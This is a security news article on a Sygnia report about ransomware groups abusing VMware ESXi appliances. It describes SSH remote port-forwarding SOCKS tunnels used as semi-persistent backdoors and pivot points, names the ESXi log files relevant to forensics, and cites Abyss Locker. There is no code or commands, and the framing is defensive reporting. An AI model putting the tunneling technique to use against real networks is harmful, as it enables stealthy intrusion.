Sygnia’s latest report reveals the evolving tactics of ransomware groups targeting VMware ESXi appliances. By exploiting these critical virtualized infrastructure components, attackers aim to disrupt operations and maintain stealthy persistence within compromised networks.
ESXi appliances have become prime targets due to their role in hosting vital virtual machines. “Damaging them renders virtual machines inaccessible, severely disrupting the business operations of affected organizations,” notes Sygnia. Beyond encrypting and exfiltrating files, ransomware operators leverage ESXi devices as pivot points to tunnel malicious traffic within networks, often undetected due to limited monitoring.
One of the techniques detailed in the report involves SSH tunneling. Attackers establish a semi-persistent backdoor by exploiting administrative credentials or vulnerabilities to access ESXi devices. Using the native SSH functionality, threat actors create a remote port-forwarding SOCKS tunnel, enabling them to blend malicious traffic with legitimate activity.
Sygnia explains, “Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network.” This approach allows attackers to bypass perimeter defenses and maintain access for extended periods.
ESXi’s logging structure complicates forensic investigations. Unlike traditional syslogs, ESXi organizes logs by activity, spreading critical events across multiple files, such as /var/log/shell.log, /var/log/auth.log, and /var/log/hostd.log. Sygnia emphasizes, “Configuring syslog forwarding from the ESXi server to an external syslog server can solve the issue.”
The report highlights Abyss Locker ransomware as an example of how ESXi appliances are exploited. Attackers used ESXi devices and Network Attached Storage (NAS) as network pivot points, underscoring the critical need for robust monitoring and defense strategies.
Related Posts:
- VMware ESXi Vulnerability Exposes Thousands of Servers to Ransomware
- VmWare releases the patch to fix CPU vulnerabilities in VMware ESXi, Workstation and Fusion
- CVE-2024-37085: VMware ESXi Vulnerability Exploited by Ransomware Gangs
- VmWare fix two high-risk arbitrary code execution vulnerabilities in several products
- Windows Sandbox Gets Supercharged: Clipboard and File Sharing Arrive
